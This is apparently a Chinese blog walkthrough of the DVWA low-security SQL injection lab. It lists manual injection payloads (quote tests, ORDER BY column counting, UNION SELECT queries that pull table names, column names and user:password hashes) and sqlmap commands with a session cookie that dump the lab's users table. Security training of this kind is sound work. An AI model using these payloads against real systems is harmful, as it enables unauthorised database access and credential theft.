天天看點

DVWA -SQL Injection (low)

low級别(手工注入 和 sqlmap工具注入)

**

手動注入

**

1.判斷是否存在注入,注入的類型是字元型還是數字型

輸入1:(輸入1-5都會傳回正确的值)

DVWA -SQL Injection (low)

輸入 1’(發現報錯,存在注入漏洞)

DVWA -SQL Injection (low)

Id是被’ ‘包括起來的,是屬于字元型注入

閉合 輸入 1’ and ‘1’=’1(查詢成功,會傳回正确的值)

DVWA -SQL Injection (low)

輸入1’ or ‘1’=’1 時,因為這個式子是永真的,傳回了所有結果。

DVWA -SQL Injection (low)

2.猜測sql查詢語句中的字段數

1’ order by 3#

DVWA -SQL Injection (low)

1’ order by 2#

DVWA -SQL Injection (low)

3.确定顯示的字段順序

0’ union select 1,2#

DVWA -SQL Injection (low)

4.擷取目前使用者,資料庫,版本号

0’ union select 1,concat(user(),database(),version())#

DVWA -SQL Injection (low)

5.擷取表名

0’ union select 1, group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#

DVWA -SQL Injection (low)

6.擷取字段名

0’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#

DVWA -SQL Injection (low)

7.擷取字段值

0’ union select 1,group_concat(user,0x3a,password) from users#

DVWA -SQL Injection (low)
DVWA -SQL Injection (low)

**

sqlmap工具注入

**

用到的參數

-u URL, --url=URL :指定URL

–cookie=COOKIE :HTTP Cookie header值

–dbs :枚舉資料庫管理系統資料庫

–tables :枚舉DBMS資料庫中的表

–columns :枚舉DBMS資料庫表列

-D DB :要進行枚舉的指定資料庫名

-T TBL :DBMS資料庫表枚舉

-C COL :DBMS資料庫表列枚舉

–dump :z轉儲資料庫表項

1.檢視有無注入點

sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

DVWA -SQL Injection (low)

有一個302跳轉,跳轉到的是登入頁面,是以這個時候需要用cookie進行會話維持,然後用burpsuite或者f12,找到cookie

DVWA -SQL Injection (low)

sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho”

DVWA -SQL Injection (low)
DVWA -SQL Injection (low)

存在注入

2.擷取資料庫名

sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” --dbs

DVWA -SQL Injection (low)

3.擷取dvwa資料庫中表名

sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa --tables

DVWA -SQL Injection (low)

4.擷取dvwa資料庫中users表中的字段名

sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --columns

DVWA -SQL Injection (low)

5.擷取user,password的值

sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users -C user,password --dump

DVWA -SQL Injection (low)

6.擷取所有字段值

sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --dump

DVWA -SQL Injection (low)

繼續閱讀